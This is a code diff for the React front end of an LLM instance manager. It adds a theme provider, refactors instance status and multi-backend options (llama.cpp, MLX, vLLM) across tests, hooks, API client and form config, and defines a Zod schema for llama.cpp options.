theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
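// Initialize from localStorage when a valid value is stored, otherwise follow the OS prefers-color-scheme setting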
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}
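// Minimal wiring sketch (hypothetical, assuming a top-level App component is rendered elsewhere):
//   <ThemeProvider>
//     <App />
//   </ThemeProvider>
// Any descendant can then call:
//   const { theme, toggleTheme } = useTheme()
// and toggle between "light" and "dark"; the effect above persists the choice to localStorage
// and keeps the "dark" class on <html> in sync.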

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext";
// Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.running.toString()}
{instance.name}:{instance.status}
</div>
))}
{/* Action buttons for testing with specific instances */}
<button
onClick={() => createInstance("new-instance", { model: "test.gguf" })}
onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance"
>
Create Instance
</button>
<button
onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance"
>
Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => {
const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } },
{ name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
];
beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
});
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => {
const newInstance: Instance = {
name: "new-instance",
running: false,
options: { model: "test.gguf" },
status: "stopped",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
model: "test.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
});
});
await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
"new-instance:false"
"new-instance:stopped"
);
});
});
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = {
name: "instance1",
running: true,
options: { model: "updated.gguf" },
status: "running",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
};
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
model: "updated.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
});
});
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
});
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false"
"instance1:stopped"
);
});
});
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other
const newInstance: Instance = {
name: "new-instance",
running: false,
status: "stopped",
options: {},
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react'
import type { HealthStatus } from '@/types/instance'
import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined {
export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
if (!isRunning) {
setHealth(undefined)
if (instanceStatus === "stopped") {
setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus)
})
// Cleanup subscription on unmount or when running changes
// Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe
}, [instanceName, isRunning])
}, [instanceName, instanceStatus])
return health
}

View File

@@ -1,4 +1,5 @@
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { handleApiError } from "./errorUtils";
const API_BASE = "/api/v1";
@@ -30,25 +31,8 @@ async function apiCall<T>(
headers,
});
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required');
}
if (!response.ok) {
// Try to get error message from response
let errorMessage = `HTTP ${response.status}`;
try {
const errorText = await response.text();
if (errorText) {
errorMessage += `: ${errorText}`;
}
} catch {
// If we can't read the error, just use status
}
throw new Error(errorMessage);
}
// Handle errors using centralized error handler
await handleApiError(response);
// Handle empty responses (like DELETE)
if (response.status === 204) {
@@ -60,6 +44,14 @@ async function apiCall<T>(
const text = await response.text();
return text as T;
} else {
// Handle empty responses for JSON endpoints
const contentLength = response.headers.get('content-length');
if (contentLength === '0' || contentLength === null) {
const text = await response.text();
if (text.trim() === '') {
return {} as T; // Return empty object for empty JSON responses
}
}
const data = await response.json() as T;
return data;
}
@@ -71,16 +63,44 @@ async function apiCall<T>(
}
}
// Server API functions
// Server API functions (moved to llama-cpp backend)
export const serverApi = {
// GET /server/help
getHelp: () => apiCall<string>("/server/help", {}, "text"),
// GET /backends/llama-cpp/help
getHelp: () => apiCall<string>("/backends/llama-cpp/help", {}, "text"),
// GET /server/version
getVersion: () => apiCall<string>("/server/version", {}, "text"),
// GET /backends/llama-cpp/version
getVersion: () => apiCall<string>("/backends/llama-cpp/version", {}, "text"),
// GET /server/devices
getDevices: () => apiCall<string>("/server/devices", {}, "text"),
// GET /backends/llama-cpp/devices
getDevices: () => apiCall<string>("/backends/llama-cpp/devices", {}, "text"),
};
// Backend API functions
export const backendsApi = {
llamaCpp: {
// POST /backends/llama-cpp/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/llama-cpp/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
mlx: {
// POST /backends/mlx/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/mlx/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
vllm: {
// POST /backends/vllm/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/vllm/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
};
// Instance API functions
@@ -136,5 +156,5 @@ export const instancesApi = {
},
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
};

View File

@@ -0,0 +1,32 @@
/**
* Parses error response from API calls and returns a formatted error message
*/
export async function parseErrorResponse(response: Response): Promise<string> {
let errorMessage = `HTTP ${response.status}`
try {
const errorText = await response.text()
if (errorText) {
errorMessage += `: ${errorText}`
}
} catch {
// If we can't read the error, just use status
}
return errorMessage
}
/**
* Handles common API call errors and throws appropriate Error objects
*/
export async function handleApiError(response: Response): Promise<void> {
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required')
}
if (!response.ok) {
const errorMessage = await parseErrorResponse(response)
throw new Error(errorMessage)
}
}

View File

@@ -1,27 +1,24 @@
import type { CreateInstanceOptions} from '@/schemas/instanceOptions';
import { getAllFieldKeys } from '@/schemas/instanceOptions'
import {
type LlamaCppBackendOptions,
type MlxBackendOptions,
type VllmBackendOptions,
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
getAllLlamaCppFieldKeys,
getAllMlxFieldKeys,
getAllVllmFieldKeys,
getLlamaCppFieldType,
getMlxFieldType,
getVllmFieldType
} from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default
export const basicFieldsConfig: Record<string, {
// LlamaCpp backend-specific basic fields
const basicLlamaCppFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
auto_restart: {
label: 'Auto Restart',
description: 'Automatically restart the instance on failure'
},
max_restarts: {
label: 'Max Restarts',
placeholder: '3',
description: 'Maximum number of restart attempts (0 = unlimited)'
},
restart_delay: {
label: 'Restart Delay (seconds)',
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',
@@ -44,17 +41,135 @@ export const basicFieldsConfig: Record<string, {
}
}
export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig
// MLX backend-specific basic fields
const basicMlxFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'mlx-community/Mistral-7B-Instruct-v0.3-4bit',
description: 'The path to the MLX model weights, tokenizer, and config'
},
temp: {
label: 'Temperature',
placeholder: '0.0',
description: 'Default sampling temperature (default: 0.0)'
},
top_p: {
label: 'Top-P',
placeholder: '1.0',
description: 'Default nucleus sampling top-p (default: 1.0)'
},
top_k: {
label: 'Top-K',
placeholder: '0',
description: 'Default top-k sampling (default: 0, disables top-k)'
},
min_p: {
label: 'Min-P',
placeholder: '0.0',
description: 'Default min-p sampling (default: 0.0, disables min-p)'
},
max_tokens: {
label: 'Max Tokens',
placeholder: '512',
description: 'Default maximum number of tokens to generate (default: 512)'
}
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
// vLLM backend-specific basic fields
const basicVllmFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'microsoft/DialoGPT-medium',
description: 'The name or path of the Hugging Face model to use'
},
tensor_parallel_size: {
label: 'Tensor Parallel Size',
placeholder: '1',
description: 'Number of GPUs to use for distributed serving'
},
gpu_memory_utilization: {
label: 'GPU Memory Utilization',
placeholder: '0.9',
description: 'The fraction of GPU memory to be used for the model executor'
}
}
export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key))
// Backend field configuration lookup
const backendFieldConfigs = {
mlx_lm: basicMlxFieldsConfig,
vllm: basicVllmFieldsConfig,
llama_cpp: basicLlamaCppFieldsConfig,
} as const
const backendFieldGetters = {
mlx_lm: getAllMlxFieldKeys,
vllm: getAllVllmFieldKeys,
llama_cpp: getAllLlamaCppFieldKeys,
} as const
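// Unknown or missing backend types fall back to the llama.cpp configuration so the form always has a sensible field set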
export function getBasicBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldConfigs
const config = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return Object.keys(config)
}
export function getAdvancedBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldGetters
const fieldGetter = backendFieldGetters[normalizedType] || getAllLlamaCppFieldKeys
const basicConfig = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return fieldGetter().filter(key => !(key in basicConfig))
}
// Combined backend fields config for use in BackendFormField
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
...basicLlamaCppFieldsConfig,
...basicMlxFieldsConfig,
...basicVllmFieldsConfig
}
// Get field type for any backend option (union type)
export function getBackendFieldType(key: string): 'text' | 'number' | 'boolean' | 'array' {
// Try to get type from LlamaCpp schema first
try {
if (LlamaCppBackendOptionsSchema.shape && key in LlamaCppBackendOptionsSchema.shape) {
return getLlamaCppFieldType(key as keyof LlamaCppBackendOptions)
}
} catch {
// Schema might not be available
}
// Try MLX schema
try {
if (MlxBackendOptionsSchema.shape && key in MlxBackendOptionsSchema.shape) {
return getMlxFieldType(key as keyof MlxBackendOptions)
}
} catch {
// Schema might not be available
}
// Try vLLM schema
try {
if (VllmBackendOptionsSchema.shape && key in VllmBackendOptionsSchema.shape) {
return getVllmFieldType(key as keyof VllmBackendOptions)
}
} catch {
// Schema might not be available
}
// Default fallback
return 'text'
}
// Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions'

View File

@@ -0,0 +1,4 @@
// Re-export all backend schemas from one place
export * from './llamacpp'
export * from './mlx'
export * from './vllm'

View File

@@ -0,0 +1,192 @@
import { z } from 'zod'
// Define the LlamaCpp backend options schema
export const LlamaCppBackendOptionsSchema = z.object({
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
threads_batch: z.number().optional(),
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
batch_size: z.number().optional(),
ubatch_size: z.number().optional(),
keep: z.number().optional(),
flash_attn: z.boolean().optional(),
no_perf: z.boolean().optional(),
escape: z.boolean().optional(),
no_escape: z.boolean().optional(),
rope_scaling: z.string().optional(),
rope_scale: z.number().optional(),
rope_freq_base: z.number().optional(),
rope_freq_scale: z.number().optional(),
yarn_orig_ctx: z.number().optional(),
yarn_ext_factor: z.number().optional(),
yarn_attn_factor: z.number().optional(),
yarn_beta_slow: z.number().optional(),
yarn_beta_fast: z.number().optional(),
dump_kv_cache: z.boolean().optional(),
no_kv_offload: z.boolean().optional(),
cache_type_k: z.string().optional(),
cache_type_v: z.string().optional(),
defrag_thold: z.number().optional(),
parallel: z.number().optional(),
mlock: z.boolean().optional(),
no_mmap: z.boolean().optional(),
numa: z.string().optional(),
device: z.string().optional(),
override_tensor: z.array(z.string()).optional(),
gpu_layers: z.number().optional(),
split_mode: z.string().optional(),
tensor_split: z.string().optional(),
main_gpu: z.number().optional(),
check_tensors: z.boolean().optional(),
override_kv: z.array(z.string()).optional(),
lora: z.array(z.string()).optional(),
lora_scaled: z.array(z.string()).optional(),
control_vector: z.array(z.string()).optional(),
control_vector_scaled: z.array(z.string()).optional(),
control_vector_layer_range: z.string().optional(),
model: z.string().optional(),
model_url: z.string().optional(),
hf_repo: z.string().optional(),
hf_repo_draft: z.string().optional(),
hf_file: z.string().optional(),
hf_repo_v: z.string().optional(),
hf_file_v: z.string().optional(),
hf_token: z.string().optional(),
log_disable: z.boolean().optional(),
log_file: z.string().optional(),
log_colors: z.boolean().optional(),
verbose: z.boolean().optional(),
verbosity: z.number().optional(),
log_prefix: z.boolean().optional(),
log_timestamps: z.boolean().optional(),
// Sampling params
samplers: z.string().optional(),
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
xtc_probability: z.number().optional(),
xtc_threshold: z.number().optional(),
typical: z.number().optional(),
repeat_last_n: z.number().optional(),
repeat_penalty: z.number().optional(),
presence_penalty: z.number().optional(),
frequency_penalty: z.number().optional(),
dry_multiplier: z.number().optional(),
dry_base: z.number().optional(),
dry_allowed_length: z.number().optional(),
dry_penalty_last_n: z.number().optional(),
dry_sequence_breaker: z.array(z.string()).optional(),
dynatemp_range: z.number().optional(),
dynatemp_exp: z.number().optional(),
mirostat: z.number().optional(),
mirostat_lr: z.number().optional(),
mirostat_ent: z.number().optional(),
logit_bias: z.array(z.string()).optional(),
grammar: z.string().optional(),
grammar_file: z.string().optional(),
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
spm_infill: z.boolean().optional(),
pooling: z.string().optional(),
cont_batching: z.boolean().optional(),
no_cont_batching: z.boolean().optional(),
mmproj: z.string().optional(),
mmproj_url: z.string().optional(),
no_mmproj: z.boolean().optional(),
no_mmproj_offload: z.boolean().optional(),
alias: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
path: z.string().optional(),
no_webui: z.boolean().optional(),
embedding: z.boolean().optional(),
reranking: z.boolean().optional(),
api_key: z.string().optional(),
api_key_file: z.string().optional(),
ssl_key_file: z.string().optional(),
ssl_cert_file: z.string().optional(),
chat_template_kwargs: z.string().optional(),
timeout: z.number().optional(),
threads_http: z.number().optional(),
cache_reuse: z.number().optional(),
metrics: z.boolean().optional(),
slots: z.boolean().optional(),
props: z.boolean().optional(),
no_slots: z.boolean().optional(),
slot_save_path: z.string().optional(),
jinja: z.boolean().optional(),
reasoning_format: z.string().optional(),
reasoning_budget: z.number().optional(),
chat_template: z.string().optional(),
chat_template_file: z.string().optional(),
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
ctx_size_draft: z.number().optional(),
device_draft: z.string().optional(),
gpu_layers_draft: z.number().optional(),
model_draft: z.string().optional(),
cache_type_k_draft: z.string().optional(),
cache_type_v_draft: z.string().optional(),
// Audio/TTS params
model_vocoder: z.string().optional(),
tts_use_guide_tokens: z.boolean().optional(),
// Default model params
embd_bge_small_en_default: z.boolean().optional(),
embd_e5_small_en_default: z.boolean().optional(),
embd_gte_small_default: z.boolean().optional(),
fim_qwen_1_5b_default: z.boolean().optional(),
fim_qwen_3b_default: z.boolean().optional(),
fim_qwen_7b_default: z.boolean().optional(),
fim_qwen_7b_spec: z.boolean().optional(),
fim_qwen_14b_spec: z.boolean().optional(),
})
// Infer the TypeScript type from the schema
export type LlamaCppBackendOptions = z.infer<typeof LlamaCppBackendOptionsSchema>
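
// Example (illustrative, not part of the original diff): the schema can validate untyped
// form values before they are persisted as instance options.
//   const parsed = LlamaCppBackendOptionsSchema.safeParse({ gpu_layers: 32, flash_attn: true })
//   if (parsed.success) {
//     const opts: LlamaCppBackendOptions = parsed.data  // fully typed options object
//   }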

// Helper to get all LlamaCpp backend option field keys
export function getAllLlamaCppFieldKeys(): (keyof LlamaCppBackendOptions)[] {
  return Object.keys(LlamaCppBackendOptionsSchema.shape) as (keyof LlamaCppBackendOptions)[]
}

// Get field type for LlamaCpp backend options
export function getLlamaCppFieldType(key: keyof LlamaCppBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
  const fieldSchema = LlamaCppBackendOptionsSchema.shape[key]
  if (!fieldSchema) return 'text'
  // Handle ZodOptional wrapper
  const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
  if (innerSchema instanceof z.ZodBoolean) return 'boolean'
  if (innerSchema instanceof z.ZodNumber) return 'number'
  if (innerSchema instanceof z.ZodArray) return 'array'
  return 'text' // ZodString and others default to text
}
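
// Usage sketch (illustrative, not part of the original diff): a form renderer could pick an
// input widget from the detected type.
//   getLlamaCppFieldType('gpu_layers')  // 'number'  (z.number().optional())
//   getLlamaCppFieldType('flash_attn')  // 'boolean' (z.boolean().optional())
//   getLlamaCppFieldType('lora')        // 'array'   (z.array(z.string()).optional())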

Some files were not shown because too many files have changed in this diff.